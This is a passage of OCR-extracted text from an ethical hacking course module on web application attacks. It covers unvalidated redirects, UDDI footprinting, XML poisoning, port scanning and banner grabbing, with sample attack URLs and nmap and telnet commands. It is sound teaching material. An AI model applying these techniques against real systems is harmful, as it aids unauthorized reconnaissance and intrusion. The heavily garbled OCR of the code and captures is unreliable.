-*■‫־‬‫.-*---־-־‬ ase.jsp?fwd=admin.jsp
A tta c k e r
^ U n v a l i d a t e d R e d i r e c t s a n d F o r w a r d s
‫ע‬ An a tta cker links to unvalidated redirects and lures th e victim to click on it. W h e n th e
vic tim clicks on th e link th in k in g th a t it is a valid site, it redirects th e victim to a n o th e r site. Such
redirects lead to installation o f m a lw a re and even m ay trick victim s into disclosing passwords or
o th e r sensitive in fo rm a tio n . An a tta cker targets unsafe fo rw a rd in g to bypass se c u rity checks.
Unsafe fo rw a rd s m ay a llo w access co ntrol bypass leading to:
Q Session Fixation Attacks
0 Security M a n a g e m e n t Exploits
© Failure to Restrict URL Access
0 M alicious File Execution
M odule 13Page 1816

U n v a l i d a t e d R e d i r e c t
User is redirected to
attacker's server
UserAttacker
Attacker sends an email
containing rew rite link to
m alicious server
(http://www.juggYboy.com/redirect.aspx?
‫־‬http://www.evil5erver.com)
U n v a l i d a t e d F o r w a r d
Administration Page
£ Create price list
Q Create item listing
*1 Purchase records
3 Registered users
Attacker is forw arded
to admin page
Attacker requests page
from server w ith a forw ard
http://w w w .juggyshop.com/purch
ase.jsp?fwd=admin.jsp
ServerAttacker
F IG U R E 1 3 .2 8 : U n v a lid a te d R e d ire c ts a n d F o rw a rd s
M odule 13Page 1817

Web Services Architecture CEHC«rt1fW4 itfciul NmIm
XML, SOAP, WSDL, Schema, WS-Advertising, etc.
.Net TCP Channel,
Fast InfoSet, etc.
Copyright © by E&Coinal.All Rights Reserved. Reproduction is Strictly Prohibited.
W e b S e r v i c e s A r c h i t e c t u r e
WS‫־‬W ork Processes
WS‫־‬Security
WS-SecureConversionWS-Federation
WS-Trust
:1
SAML Kerberos X.509
SecurityToken Profiles
XML Encryption
XML Digital Signatures
WS
Security
Policy
WS‫־‬Policy
XML, SOAP, WSDL, Schema, W S-Advertising, etc.
HTTP
j .Net TCPChannel,
Fast InfoSet, etc.
* T O
FIGURE 13.29: W eb Services A rchitecture
M odule 13Page 1818

Web Services Attack CUrlifM
EHIUmjI NMhM
0Web services evolution and its increasing use in business offers new attack vectors in an application
framework
0
Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing
the connection points; Universal Description, Discovery, and Integration (UDDI) forthe description and
discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web
^ 4 ^ 1‫־‬ ^ e b S e r v i c e s A t t a c k
W e b services e v o lu tio n and its increasing use in business o ffers n ew attack vectors in
an application fra m e w o rk . W e b services are process-to-process co m m u n ic a tio n s th a t have
special security issues and needs. W e b services are based on XM L p ro toco ls such as W eb
Services D efin itio n Language (WSDL) fo r describing th e co nn ectio n points; Universal
D escription, Discovery, and Inte gratio n (UDDI) fo r th e d escription and discovery o f w eb
services; and Sim ple O bject Access Protocol (SOAP) fo r c o m m u n ic a tio n b e tw e e n w e b services
th a t are vu ln era ble to various w e b application threats. Sim ilar to th e w ay a user interacts w ith a
w e b application th ro u g h a brow ser, a w e b service can in te ra ct d irectly w ith th e w e b application
w ith o u t th e need fo r an interactive user session or a b row ser.
These w e b services have detailed d e fin itio n s th a t a llo w regular users and attackers to
u nd ersta nd th e c o n s tru c tio n o f th e service. In this w ay, m uch o f th e in fo rm a tio n req uired to
fin g e rp rin t th e e n v iro n m e n t and fo rm u la te an attack is p rovided to th e attacker. It is e stim ated
th a t w e b services re in tro d u c e 70% o f th e vu ln era bilitie s on th e w eb. Some exam ples o f this
typ e o f attack are:
Q An a tta cker injects a m alicious script into a w e b service, and is able to disclose and
m o d ify a pp lica tion data.
© An atta cker is using a w e b service fo r o rd e rin g products, and injects a script to reset
q u a n tity and status on th e c o n firm a tio n page to less th a n w h a t was originally ord ered .
M odule 13Page 1819

In this way, th e system processing th e o rd e r reque st subm its th e order, ships th e order,
and th e n m od ifie s th e o rd e r to show th a t a sm aller n u m b e r o f p roducts are being
shipped. The atta cker w inds up receiving m o re o f th e p ro d u c t th an he o r she pays for.
Ethical Hacking and C ounterm easures Exam 312-50Certified Ethical Hacker
M odule 13Page 1820

W e b S e r v i c e s F o o t p r i n t i n g A t t a c k C E H
C«rt1fW4 itfciul NmIm
J A tta c k e r s f o o t p r i n t a w e b a p p lic a tio n t o g e t U D D I i n f o r m a t io n s u c h a s b u s in e s s E n tity ,
b u s in e s S e rv ic e , b in d in g T e m p la te , a n d t M o d e l
X M L R e s p o n s eX M L Q u e r y
HTTP200 1.1‫־‬OK
Date: Tue. 28 Sep 2004 10:07:42 GMT
Server: Mk*osoft-llS6.0‫׳‬
X-Powered-By: ASP.NET
XAspNet-Vers-oo 1 1 4322
Cache-CortroJ: private, max-age=0
Contort•Type: text/xml: cbarsot-utf 8
Contert•Length: 1272
<?xml versk)n=*l.0‫־‬ encoding=‫־‬‘utl-8,'?><80ap:Env0l0p0
xmlnssoap-'bttp ‫/׳‬schemas xmlsoap org/soap/onvolopor xmlns:xsi-^ttp://www.w3.org/2001 ‫׳׳‬XMLSchoma
instance' xm1n8:xsd‫־‬*hnp:/‫/׳‬www.w3.org/2001/XMLSchema,'><8oap:Body><8erv1ceList generic-^.O"
operator-*Microsoft Corporation‫־‬• truncated-"false" xmlns-‫־‬,urn:uddi-org:apl_v2‫<>״‬servicelnfos><servicelnfo
se‫׳‬viceKey=*6ec464eO-218d-4dafb4dd‘>dd4ba9dc8l3’' businessKey=*9l4374tbM01-4834-b8ef-
c9c34c8a0ce5*><namo xml lang-*on-us"> <>namo></sorvicolnk»<sorvicolnlo
sorvcoKoy-M1213238• 1b33 4014 8756 c89cc31250CC■• businossKoy-"bfb9dc23adoc-4173bd5f•
5545abacaalb"xnamc xml:lang-"en-us"> </namc></scrviceln10xscfvicelnlo
serv!ceKey«‫״‬ba6d9d56-ea3M263-a95a-eebl 7e59l Odb" businessKey="18b71de2-dl 5c-437c-8877-
cbec82l6d0f5’ xnam e xml:lang=*en"> </namcx/servicelnloxservicelnlo
serviceKey»‫״‬bc82a008-5e4e4‫־‬cOc-8dba-c5e4e268le12" busines8Key»18785586-295‫״‬e-448a-b759-
Cbb44a049t21”xnam e xml:lang="on*> <-‫׳‬namo></scrvicclnfo><scfvicclnfo
serviceKey-,8faa80ea-42dd4‫־‬cOd*8070999‫־‬ce0455930" businessKey-"ee41518b-bf99-4a66-9e9e-
c33c4c43db5a*xname
xH1l:lang«*en'> </name></serviceln10><7serviceln10s></serviceList><;soap:Body><.'soap:
POST /inquire HTTP/1.1
Content•Type: text/xml; charset=utf-8
SOAPAction: —
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.miaosoft.com
Accept: text/html,image/gif, image/jpeg/; q=.2, /; q=.2
Connection: keep-alive
Content-Length:229
<?xml version1.0"‫"־‬ encoding‫־‬"UTF-8" ?>
<Envelop
xmlns="http://scemas.xmlsoap.org/soap/envelop/">
<Body>
<fmd_business generic="2.0" maxRows"50"
xmlns="urn"uddi-
org:api_v2"xname>amazon</name></find_business>
</Body>
</Envelop>
HTTP/1.1 50 Continue
^ W e b S e r v i c e s F o o t p r i n t i n g A t t a c k
^ ^ A ttackers use Universal Business Registry (UBR) as m a jo r source to g ath e r in fo rm a tio n
o f w e b services. It is very useful fo r b oth businesses and individuals. It is a p ub lic re g istry th a t
runs on UDDI specifications and SOAP. It is s o m e w h a t sim ilar to a "W h o is server" in
fu n c tio n a lity . To register w e b services on UDDI server, business o r organizations usually use one
o f th e fo llo w in g structures:
Q Business Entity
Q Business Service
© Binding T em ple
e Technical M o d e l (tm o d el)
Hence, attackers fo o tp r in t a w e b application to get UDDI in fo rm a tio n such as businessEntity,
businesService, bindin gT e m p late , and tM o d e l.
M odule 13Page 1821

X M L Q u e r y X M L R e s p o n s e
POST/inquire HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "‫״‬
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com
Accept: text/html, image/glf, image/jpeg,*; q=.2, /; q=.2
Connection: keep-alive
Content‫־‬Length:229
<?xml version="1.0" encoding="UTF-8" ?>
<Envelop
xmlns="http://scemas.xmlsoap.org/soap/envelop/">
<Body>
<find_businessgeneric="2.0" maxRows"50"
xmlns="urn"uddi-
0rg:api_v2"xname>amaz0n</namex/find_business>
</Body>
</Envelop>
HTTP/1.1 SO Continue 0 —
HTTP?1.1 200OK
Date: Tue, 28Sep 2004 10:07:42GMT
Server: Microsotl-IIS'6.0
X-Powered-By: ASP NET
X-AspNet Version: 1.1.4322
Cache-Control: private,‫וזז‬ax-age-0
Content-Type: text/xml: cnarset-ut(8
Content-Length: 1272
<?!tml version1.0-‫"־‬encoding="utf-8"?><soap:Envelope
xmlns:soap‫״־‬nttp://schemas.xmlsoaporg/soap/enveloper xmlns:*si‫־‬"http://www.w3.org/2001/XMLSchema-
instance" xmlns:xsd‫־‬‘http^AMWw.w3.org/2001/XMLSchema"><soap:BodyxserviceList generic^"2.0"
operator‫־‬"Microsoft Corporation" truncated‫־‬"false'' xmlns‫־‬"um:uddi-0rg:api_v2‫־‬xservicelnfosxserviceln1o
servjceKey=6‫־‬ec464eO-2f8d-4dal-b4dd-5dd4ba9dc8f3■businessKey-914374‫־‬fb-(10f-4634-b8el-
C9e34e8a0ee5'xname xml:lang='en-us"> </namex/servicelr1to><serv1celnto
serviceKey=41213238-1‫־‬b33-40f4-8756-c89cc3125eoc‫־‬businessKey=‫־‬bfb9dc23-adec-4(73-bd5f-
5545abaeaa1b’><name xml:lang="en-us"> </name><feerviceln10><serviceln10
setviceKey»T>a6d9d56-ea3f-4263-a95a-eeb176591Odb’ businessKey-'t8b7lde2‫־‬d15c-437c8877‫-־‬
ebec8216d015"xname xml:lang='en"> </namex/serv1celnt0xservicelnk>
sen‫״‬ceKey-"bc82aO38-5e4e1'‫־‬c0c-8dba-c5e4e268fe12" businessKey-"18785586-295e-448a-b759-
ebb44a049f21"xname xml:lang="en"> </namex/serv1celnf0xservcelnf0
serviceKey-"8faa80ea-42dd-4c0d-8070-999ce0455930"businessKey-'ee41518b-b(99-4a66-9e9e-
c33c4c43db5a"xname
*a51lang.‫־‬en‫>־‬ </name></servicelnfox/servicelnlos></serviceUst></soap:Body><'soap:
^pveiopo
F IG U R E 1 3 .3 0 : W e b S e rv ic e s F o o tp r in tin g A tta c k
M odule 13Page 1822 Ethical Hacking and C ounterm easures Copyright © by EC-C0l1nCil

C E HW e b S e r v i c e s X M L P o i s o n i n g
Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema
poisoning in order to generate errors in XML parsing logic and break execution logic
Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection
openings and can be exploited for other web service attacks
XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information
X M L R e q u e st P o iso n e d X M L R e q u e st
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>
2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason (®springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
W e b S e r v i c e s X M L P o i s o n i n g
XM L poisoning is sim ilar to a SQL inje ction attack. It has a larger success rate in a w eb
services fra m e w o rk . As w e b services are invoked using XM L d ocu m e nts, th e tra ffic th a t goes
b e tw e e n server and b ro w s e r applications can be poisoned. A ttackers create m alicious XML
d o cu m e n ts to a lte r parsing m echanism s like SAX and DOM th a t are used on th e server.
A ttackers insert m alicious XM L codes in SOAP requests to p e rfo rm XML node m a n ip u la tio n or
XM L schem a poisoning in o rd e r to g en erate e rrors in XM L parsing logic and break execution
logic. A ttackers can m a n ip u la te XM L e xternal e n tity references th a t can lead to a rb itra ry file or
TCP co nn ectio n openings and can be e xploite d fo r o th e r w e b service attacks. XM L poisoning
enables attackers to cause a denial-of-service attack and c o m p ro m is e c o nfid en tial in fo rm a tio n .
M odule 13Page 1823

F IG U R E 1 3 .3 1 : W e b S e rv ic e s X M L P o is o n in g
M odule 13Page 1824

Hacking M e th o d o lo g y
m m
W eb A p p lic a tio n Hacking Tools
‫־‬ ‫־‬ ^ M o d u l e F l o w
So far, w e have discussed w e b a pp lica tion co m p o n e n ts and various th re a ts associated
w ith w e b applications. N ow w e w ill discuss w e b application hacking m e th o d o lo g y . A hacking
m e th o d o lo g y is a w a y to check every possible w a y to c o m p ro m is e th e w e b a pp lica tion by
a tte m p tin g to e xploit all p o te n tia l v u ln era bilitie s present in it.
^ W e b A p p Pen Testing W e b A p p Concepts
S ecurity Tools W e b A p p T hre ats
C o u n te rm e a s u re s ^ Hacking M e th o d o lo g y
1S 1
W e b A p p lic a tio n Hacking Tools
This section gives a detailed explanation o f w e b app lication hacking m e th o d o lo g y.
M odule 13Page 1825

W e b A p p H a c k i n g M e t h o d o l o g y# n ^
‫ס‬ <n>
In o rd e r to hack a w e b application, th e a tta cker initially tries to gath er as m uch
in fo rm a tio n as possible a b o u t th e w e b in fra stru ctu re . F oo tp rin tin g is one m e th o d using w hich
an a tta cke r can g a th e r valuable in fo rm a tio n a b o u t th e w e b in fra s tru c tu re or w e b application.
M odule 13Page 1826

Footprint Web Infrastructure CEH
J W e b in f r a s t r u c t u r e f o o t p r i n t i n g i s t h e f ir s t s te p in w e b a p p lic a tio n h a c k in g ; it h e lp s a tta c k e r s t o
s e le c t v ic t im s a n d id e n t if y v u ln e r a b le w e b a p p lic a tio n s
Hidden
Content Discovery
E x tra c t c o n te n t and
fu n c tio n a lity th a t is n o t
d ire c tly lin k e d o r re a c h a b le
fro m th e m a in v is ib le c o n te n t
Server Identification
G rab s e rv e r b a n n e rs to
id e n tify th e m ake and
v e rs io n o f th e w e b
s e rv e r s o ftw a re
Server Discovery
D is c o v e r th e physical
s e rv e rs th a t h o s ts
w e b a p p lic a tio n
Service Discovery
D is c o v e r th e s e rv ic e s ru n n in g o n w e b
s e rv e rs th a t can be e x p lo ite d as
a tta c k p a th s fo r w e b a p p h a ckin g
F o o t p r i n t W e b I n f r a s t r u c t u r e
W e b in fra s tru c tu re fo o tp rin tin g is th e first step in w eb a pp lica tion hacking; it helps
attackers to select victim s and id e n tify v u ln e ra b le w e b applications. Through w e b
in fra s tru c tu re fo o tp rin tin g , an atta cker can p e rfo rm :
‫י‬ S e r v e r D i s c o v e r y
In server discovery, w h e n th e re is an a tte m p tin g to co nn ect to a server, th e re d ire c to r
makes an inco rre ct assum ption th a t th e ro o t o f th e URL nam espace w ill be W ebD A V -
aware. It discovers th e physical servers th a t host w e b application.
S e r v i c e D i s c o v e r y
Discovers th e services running on w e b servers th a t can be e xp loite d as a tta ck paths
fo r w e b app hacking. The service discovery searches a ta rg e te d a p p lic a tio n e n v iro n m e n t fo r
loads and services a uto m a tica lly.
S e r v e r I d e n t i f i c a t i o n
Grab th e server b anners to id e n tify th e m ake and version o f th e w e b server so ftw are.
It consists of:
Q Local Id e n tity : This specifies th e server Origin-Realm and O rigin-Host.
M odule 13Page 1827 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil

e Local Addresses: These specify th e local IP addresses o f th e server th a t uses fo r
D iam ete r Capability Exchange messages (CER/CEA messages).
Q Self-Nam es: This field specifies realm s to be considered as a local to th e server, it m eans
th a t any requests sent fo r these realm s w ill be tre a te d as if th e re is no realm in the
specified request send by th e server.
W f H i d d e n C o n t e n t D i s c o v e r y
°°°‫^י‬ Extract c o n te n t and fu n c tio n a lity th a t is n ot d ire ctly linked or reachable fro m th e m ain
visible c o nte nt.
M odule 13Page 1828

F o o t p r i n t W e b I n f r a s t r u c t u r e :
S e r v e r D i s c o v e r y
■ S e r v e r d is c o v e r y g iv e s in f o r m a t i o n a b o u t t h e l o c a t i o n o f s e r v e r s a n d e n s u r e s t h a t t h e t a r g e t
s e r v e r is a l iv e o n I n t e r n e t
W hois lo o ku p u tility gives in fo rm a tio n a b o u t th e IP address o f w e b server and
DNS nam es
e http://w w w .w h ois.net
G http://w w w .dnsstuff.com
W hois Lo o ku p Tools:
e http://w w w .tam os.com
s h ttp://ne tcraft.com
DNS In te rro g a tio n provides in fo rm a tio n a b o u t the lo ca tio n and ty p e o f servers
DNS In te rro g a tio n Tools:
8 http://e-dns.org
» http://w w w .dom aintools.com
9 http://w w w .dnsstuff.com
« http://netw ork-tools.com
1
Port Scanning attem pts to connect to a particular set o f TCP or UDP ports to find out
the service th a t exists on th e server
Port Scanning Tools:
9 Nmap 0 W hatsUp PortScannerTool
8 NetScan Tools Pro 6 Hping
F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v e r D i s c o v e r y
In o rd e r to fo o tp r in t a w e b in fra stru ctu re , firs t you need to discover th e active servers
on th e in te rn e t. Server discovery gives in fo rm a tio n a b o u t th e location o f active servers on th e
Inte rn et. The th re e techniques, n am ely w ho is lookup, DNS in te rro g a tio n , and p o rt scanning,
help in discovering th e active servers and th e ir associated in fo rm a tio n .
W h o i s L o o k u p
f 3):
W h o is Lookup is a to o l th a t allow s you to g ath e r in fo rm a tio n a b o u t a d om ain w ith the
help o f DNS and WHOIS queries. This produces th e result in th e fo rm o f a HTML
rep ort. It is a u tility th a t gives in fo rm a tio n a b o u t th e IP address o f th e w e b server and DNS
names. Some o f th e W h o is Lookup Tools are:
h ttp ://w w w .ta m o s .c o m
h ttp ://n e tc ra ft.c o m
h ttp ://w w w .w h o is .n e t
h ttp ://w w w .d n s s tu ff.c o m
D N S I n t e r r o g a t i o n
DNS in te rro g a tio n is a d is trib u te d database th a t is used by varied organizations to
e
e
e
0
o
M odule 13Page 1829 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil

co nn ect th e ir IP addresses w ith th e respective h o s tn a m e s and vice versa. W h e n th e DNS is
im p ro p e rly connected , th e n it is very easy to e xp lo it it and g ath e r req uired in fo rm a tio n fo r
launching th e attack on th e ta rg e t organization. This also provides in fo rm a tio n a b o u t th e
location and ty p e o f servers. Some o f th e to ols are:
© h ttp ://w w w .d n s s tu ff.c o m
© h ttp ://n e tw o rk -to o ls .c o m
© h ttp ://e -d n s .o rg
© h ttp ://w w w .d o m a in to o ls .c o m
m m ■ P o r t S c a n n i n g
B U I Port scanning is a process o f scanning th e system ports to recognize th e open doors. If
any unused open p o rt is recognized by an attacker, th e n he or she can in tru d e into
th e system by e xploitin g it. This m e th o d a tte m p ts to co nn ect to a p a rticula r set o f TCP o r UDP
ports to fin d o u t th e service th a t exists on th e server. Some o f th e tools are:
© N m ap
© NetScan Tools Pro
© W h a tsU p P ortscanner Tool
© Hping
M odule 13Page 1830

F o o t p r i n t W e b I n f r a s t r u c t u r e :
S e r v i c e D i s c o v e r y
Copyright © by HrCounctl. All Rights Reserved. Reproduction is Strictly Prohibited.
F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v i c e D i s c o v e r y
Service discovery finds th e services running on w e b servers th a t can be e xploited as
attack paths fo r w e b a pp lica tion hacking. Service discovery searches a ta rg e te d a p p lic a tio n
e n v iro n m e n t fo r loads and services a uto m a tica lly. The ta rg e te d server has to be scanned
th o ro u g h ly so th a t c o m m o n ports used by w e b servers fo r d iffe re n t services can be identified.
The ta ble th a t fo llo w s show s th e list o f c o m m o n ports used by w e b servers and th e respective
HTTP services:
P o rt T ypical HTTP Services
80 W o rld W id e W e b standard p o rt
81 A lte rn a te W W W
88 Kerberos
443 SSL (https)
900 IBM W e b sph ere a d m in is tra tio n client
2 3 0 1 C o m p a q I n s i g h t M a n a g e r
M odule 13Page 1831

2381 C om paq Insight M an ag er o ver SSL
4242 M ic ro s o ft A p plica tion C enter Rem ote m a n a g e m e n t
7001 BEA W eblogic
7002 BEA W e b lo gic over SSL
7070 Sun Java W e b Server over SSL
8000 A lte rn a te W e b server, o r W e b cache
8001 A lte rn a te W e b server or m a n a g e m e n t
8005 Apache T om ca t
9090 Sun Java W e b Server a dm in m od ule
10000 Netscape A d m in is tra to r interface
T A B L E 1 3 .1 : S e rv ic e D is c o v e ry
You can discover th e services w ith th e help o f tools such as N m ap, NetScan Tools Pro, and
Sandcat Browser.
Source: h ttp ://n m a p .o rg
N m ap is a scanner th a t is used to fin d in fo rm a tio n a b o u t systems and services on a n e tw o rk and
to co n stru ct a m ap o f th e n e tw o rk . It can also define d iffe re n t services run nin g on th e w e b
server and give detailed in fo rm a tio n a b o u t th e re m o te co m p ute rs.
L=±hJZenmap
Scan Tools Profile Help
Scan CancelTarget: google.com
Command: nmap •T4 -A -v -PE -PS22.25.80 -PA21.23.80.3389 google.com
Nmap Output Ports/Host! Topology |Host Details |Scans j
< Port * Protocol * State < Service * Version
# SO tcp open http
# 113 tcp closed ident
A 443 tcp open https
OS < Host
.9 google.com (74.12
‫־‬C
Filter Hosts
F IG U R E 1 3 .3 2 : Z e n m a p T o o l s c r e e n s h o t
M odule 13Page 1832

F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v e r
I d e n t i f i c a t i o n / B a n n e r G r a b b i n g
A n a ly z e th e s e r v e r re s p o n s e h e a d e r f ie ld t o id e n t if y t h e m a k e , m o d e l, a n d v e r s io n
o f th e w e b s e r v e r s o ftw a r e
This in fo rm a tio n h e lp s a tta c k e rs to s e le c t th e e x p lo its fro m v u ln e ra b ility d a ta b a se s to
a tta c k a w e b s e rv e r a nd a p p lic a tio n s
C:te ln e t www. juggyboy.com 80 HEAD / HTTP/1.0
Server identified
as M icrosoft IIS
HTTP/1.1 200 OK
§ate?rihu!C095Jj!”idSs5!Content-Lfrgth: 1270Content-Type: text/Mml
sJt-Cookl»T°*Cp5cis:CNID««TC0e0-PBLPKEK0N0<:K0FFIP0CHPLNEiVia: 1.1 Application aid Content Networking Systen Softvware 5.1.15
Connect io n ! C lose
nneetIonto ho«t lost.
4. N e tc ra ft3. ID S e rve
B a n n e r g r a b b in g t o o ls :
1. T e ln e t 2. N e tc a t
H
Copyright © by E&Cauicfl. All Rights Reserved. ReproductionisStrictly Prohibited.
‫׳‬ ■, F o o t p r i n t W e b I n f r a s t r u c t u r e : S e r v e r
I d e n t i f i c a t i o n / B a n n e r G r a b b i n g
T hrough b an ne r grabbing, an a tta cke r identifies brand a n d /o r version o f a server, an o p e ra ting
system , o r an application. A ttackers analyze th e server response header field to id e n tify th e
m ake, m odel, and version o f th e w e b se rve r s o ftw a re . This in fo rm a tio n helps attackers to
select th e exploits fro m v u ln e ra b ility databases to attack a w e b server and applications.
C : t e l n e t w w w .ju g g y b o y .c o m 80 HEAD / H T T P /1 .0
A b anner can be grabbed w ith th e help o f to ols such as:
© T elnet
Q N etcat
e ID Serve
© N etcra ft
These tools m ake b anner grabbing and analysis an easy task.
M odule 13Page 1833

S e rver id e n tifie d
as M ic ro s o ft IIS
H TTP/l.1 200 OK ^ __________________________
Server:
Date: Thu. 07 Jul 2005 13:08:16 GMT
Content-Length: 1270
Content-Type: text/html
sit-CookieT°ASP§ESsf0NIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path‫־‬ /
Via: 1.1 A p p lica tion and Content Networking System Software 5.1.15
Connection: Close
Connection to host lo s t.
C:>
‫:ם‬
F IG U R E 1 3 .3 3 : S e rv e r Id e n t if ic a t io n /B a n n e r G ra b b in g
M odule 13Page 1834

F o o t p r i n t W e b I n f r a s t r u c t u r e : H i d d e n
C o n t e n t D i s c o v e r y
C E H
J D isco ve r th e h id d e n c o n te n t a nd fu n c tio n a lity th a t is n o t re a ch a b le fro m th e m ain
v is ib le c o n te n t to e x p lo it u se r p riv ile g e s w ith in th e a p p lic a tio n
J It a llo w s an a tta c k e r to re c o v e r b a cku p copies o f live file s, c o n fig u ra tio n file s and log
file s c o n ta in in g s e n sitive d a ta , ba cku p a rch ive s c o n ta in in g sn a p sh o ts o f file s w ith in
th e w e b ro o t, n e w fu n c tio n a lity w h ic h is n o t linked to th e m a in a p p lic a tio n , etc.
e Use a u to m a tio n to o ls such
as Burp suite to make
huge num bers o f requests
to th e w e b server in o rd e r
to guess th e nam es o r
id e n tifie rs o f hidden
co n te n t and fu n c tio n a lity
Attacker-Directed
Spidering
Attacker accesses all o f the
application's functionality
and uses an intercepting
proxy to m o n ito r all requests
and responses
The intercepting proxy parses
all of the application's
responses and reports the
content and functionality it
discovers
Tool: OWASP Zed A tta ck
Proxy
© W eb spiders a u to m a tica lly
d isco ve r th e hid d e n
c o n te n t and fu n c tio n a lity
by parsing HTML fo rm and
client-side JavaScript
requests and responses
© W eb S p iderin g Tools:
S OWASP Zed A tta ck Proxy
S Burp S pider
- W ebS carab
F o o t p r i n t W e b I n f r a s t r u c t u r e : H i d d e n C o n t e n t
D i s c o v e r y
Crucial in fo rm a tio n related to th e business such as prices o f products, discounts, login IDs, and
passwords is ke pt secret. This in fo rm a tio n is usually n o t visible to outsiders. This in fo rm a tio n is
usually stored in hidden fo rm fields. Discover th e hidden c o n te n t and fu n c tio n a lity th a t is n ot
reachable fro m th e m ain visible c o n te n t to e xploit user privileges w ith in th e application. This
allow s an a tta cker to recover backup copies o f live files, c o n fig u ra tio n files, and log files
c o nta ining sensitive data, backup archives co nta ining snapshots o f files w ith in th e w e b roo t,
n ew fu n c tio n a lity th a t is n ot linked to th e m ain application, etc. These hidden fields can be
d e te rm in e d w ith th e help o f th re e techniques. They are:
W e b S p i d e r i n g
W e b spiders a u to m a tic a lly discover hidden c o n te n t and fu n c tio n a lity by parsing HTML
fo rm s and client-side JavaScript requests and responses.
Tools th a t can be used to discover th e hidden c o n te n t by m eans o f w e b sp id e rin g include:
Q OWASP Zed A ttack Proxy
Q Burp Spider
© W ebScarab
M odule 13Page 1835

A t t a c k e r - D i r e c t e d S p i d e r i n g
An a tta cker accesses all o f th e a pp lication's fu n c tio n a lity and uses an intercep ting
proxy to m o n ito r all requests and responses. The in te rc e p tin g p ro x y parses all o f th e
a pp lication's responses and rep orts th e c o n te n t and fu n c tio n a lity it discovers.
The same to o l used fo r w eb spidering, i.e., OWASP Zed A ttack Proxy can also be used fo r
a tta cker-d ire cte d spidering.
B r u t e F o r c i n g
Brute fo rcin g is a ve ry p o p ular and easy m e th o d to attack w e b servers. Use
a u to m a tio n tools such as Burp Suite to m ake large n um be rs o f requests to th e w e b
server in o rd e r to guess th e nam es o r ide ntifie rs o f h id d e n c o n te n t and fu n c tio n a lity .
M odule 13Page 1836

W e b S p i d e r i n g U s i n g B u r p S u i t e C E H
C«rt1fW4 itfciul NmIm
intruder attack 1
resurs ttrset j po3mons payioaqs | options
comment
!reouesr
.10443‫כ‬weosovce*woe* ?00
OTT /th 7 1 d - l. 4M7«C150040::3 U [1id‫־‬ l , I HTTP/I. I
MvO.. kl1.iM.LliUJ.UVl
Pxoxy-C onntction: kwp-««l.Lve
1lM t‫־‬ lg *n e : K o x ilW S .O (Window■* NT C.2; V0V£«) Appl«0»bXlt/337. «
{KBTHL, like Oeeko) Chrowe/22.0.i229.9‫־‬l Srttor1/S 37.1
Accept: ‫•/י‬
Mttrtn
h t t p : / / v ‫׳‬rf‫־‬rf.M ng .co» / U »*y«s/i«a1:ch?q-blk*i11id‫־‬ «CCC7«70<SClCPJA9P:SA,SS9<J
5ir1C575D1:594*POPH-rcrRBA
Accvpt-Zncodisvg: cjzip, d * f lu te , aclch
Accept-langua{re: en-US, en: g8.0‫־‬
iccepc-cnatrsec: JSO-88SS-l,uc£-8;«r=0.7, ';q *0 .3
comparer | options | alpris—‫׳‬uaeT repeater | sequencer ' aecoaer
[ p93!tons payloads ' options |
| 0 matches
http://w w w .portsw igger.net
Copyright © by E&Coinal. All Rights Reserved. Reproduction isStrictly Prohibited.
loauflit rssponso |
nw r.-nm‫־‬ rrnfleri hf<
Check th e site m ap generated by th e Burp
proxy, and id e n tify any hidden a p p lica tion
co n te n t o r functions
C ontinue these steps recursively un til no
fu rth e r c o n te n t o r fu n c tio n a lity is
id e n tifie d
C o n fig u re y o u r w e b b ro w se r to use Burp as a local proxy
Access th e e n tire ta rg e t a p p lic a tio n visiting every single
link/U R L possible, and subm it all th e a p p lica tio n fo rm s
available
Brow se th e ta rg e t a p p lic a tio n w ith JavaScript enabled and
disabled, and w ith cookies enabled and disabled
lendin 46*.
burp suite free edition v1.4.01
2 payweq poamona
OCT / tb ? ld H ^ W 'r '
H>9t: t3 1.w w .b ln g.ne t
P roxy-ccnnccciotu icecp -« 1m
U w -A « j-n t: M o xtllA /S .a (Utnclowx NT t . 2; IfOWM)
AppleVebK1c/S39.^ iKITOJL, Like Cecko)
-hrone, ‫ג‬ ‫ב‬ . u .1 ::9 .3 a S a ta r1/637.4
Ic’cvpt: »/*
R»Z«x«x:
h ttp ://* » w .b in g .c ocV anwwj-.‫/י־‬ ito c c M q-b i c~*lid-«CCC7£'70
6SCICD3ASD2EABE06351PE0S7SD12S54tP ORN-1OPRBA
Accept-Encoding: g z 1 p ,d e lla te , 9dcH
W e b S p i d e r i n g U s i n g B u r p S u i t e
^ ^ Source: h ttp ://w w w .p o rts w iR g e r.n e t
Burp Suite is an integ ra te d p la tfo rm fo r attacking w e b applications.It contains all th e Burp tools
w ith n um erou s interfaces b e tw e e n th e m , designed to fa cilita te and speedup th e process o f
attacking an application.
Burp Suite allow s you to co m b in e m anual and a u to m a te d techn iqu es to e nu m e ra te , analyze,
scan, attack, and e xp lo it w e b applications. The various B urp to o ls w o rk to g e th e r e ffe ctively to
share in fo rm a tio n and a llo w findings ide ntifie d w ith in one to o l to fo rm th e basis o f an attack
